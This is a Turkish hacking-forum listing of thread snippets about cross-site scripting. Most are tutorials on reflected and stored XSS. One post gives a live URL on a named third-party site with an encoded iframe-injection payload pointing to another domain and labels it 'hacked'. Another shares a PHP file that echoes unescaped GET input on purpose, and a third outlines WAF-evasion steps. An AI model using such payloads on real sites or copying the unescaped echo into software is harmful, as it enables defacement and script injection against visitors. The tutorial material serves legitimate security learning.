• Gizli içerikleri açmak için anlamsız yorum yapmak, kışkırtıcı davranışlarda bulunmak ve link kısaltmak BAN sebebidir.

xss

  1. Muncuk Han

    6xss hacked

    http://www.janbrine.co.uk/art.php?id=4%27%3Ciframe%20src=%22https://darbeciler.com/thsm.html%22%20width=%22100%%22%20height=%22100%%22%3E%3C/iframe%3E...
  2. Reisci

    XSS Açığı Nedir ve Nasıl Tespit Edilir?

    Web uygulamalarının güvenliği her geçen gün daha da önemli hale geliyor. Bu uygulamaların hataları, siber suçluların sisteme sızmasını kolaylaştırabilir. Bu açıklardan biri de XSS açığıdır. XSS Açığı Nedir? XSS (Cross-Site Scripting), web uygulamalarındaki en yaygın güvenlik açıklarından...
  3. Stronger_Cracker

    basit bir xss senaryosu için xss hata koduna sahip bir php dosyası

    <html> selam <?php echo $_GET["name"]; ?> </html> bu kodu dosyaadı.php olarak kaydedin ardından ister iç ağada isterseniz ise bir web sitesine yükleyin dosyaadı.php?name=istediğinizi yazın xss açığı nın olduğunu görüceksiniz
  4. Reisci

    » WEB | OWASP TOP 10 | REFLECTED XSS

    OWASP TOP 10 | REFLECTED XSS Cross Site Scripting(XSS) açığı güvenli web geliştirme aşamalarına dikkat edilmediğinde, Websitesi üzerindeki veri giriş alanlarının sömürülerek istenen kod parçacıklarının(payload) enjekte edilmesi durumudur. Bu yazı serisinde Reflected ve Stored XSS...
  5. Reisci

    » WEB | OWASP TOP 10 | Stored XSS

    OWASP TOP 10 | STORED XSS application.security üzerinden oluşturduğumuz OWASP TOP 10 yazı dizisinin bir önceki konusunda teorik olarak XSS den bahsettik. Reflected XSS konusunu okumadan bu konuya geçmeyin.Simülasyon üzerinden Stored XSS açığını anlatmaya başlayalım. İntermart isimli bir...
  6. Reisci

    XSS Açığı Nedir ? Nasıl Yararlanılır?

    XSS AÇIĞI NEDİR ? XSS Açığı, Cross Site Scripting'dir. Büyük şirketlerde bile bu açık bulunur mesela örnek vermek gerekirse Arsenik hocamız paylaşmıştı Microsoft'un web sitesinde XSS Açığını bulduklarını mesela. Bu açık yorum veya text kutularında olan bir açıktır ve çok tehlikeli olduğu...
  7. Nesih Abi

    XSS Sömürme İşlemi

    XSS'den faydalanma. 1-Kara listeye alınan/filtrelenen karakterleri bulun. 2-WAF tarafından hangi etiketlerin engellendiğini ve hangi anahtar kelimelere izin verildiğini gözlemleyin (iframe, img, body vb.) 3-Karakter Kodlamayı Deneyin (URL kodlaması, Çift URL kodlaması, UTF-8 Unicode...
Geri
Üst